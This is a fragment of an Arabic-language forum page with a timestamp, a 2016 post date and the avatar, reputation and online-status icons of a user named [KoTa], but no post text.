الساعة الآن 01:50 AM .
18-08-2016, 06:28 AM
![الصورة الرمزية [KoTa]](image.php?u=128751&dateline=1457617687)
المواضيع المتشابهه
![[KoTa] صـاعـد](sawaweb/reputation/reputation_pos.gif)
![[KoTa] غير متواجد حالياً](sawaweb/statusicon/user_offline.gif)
.gif){kind=icon}
.gif){kind=icon}
العرض المتطور
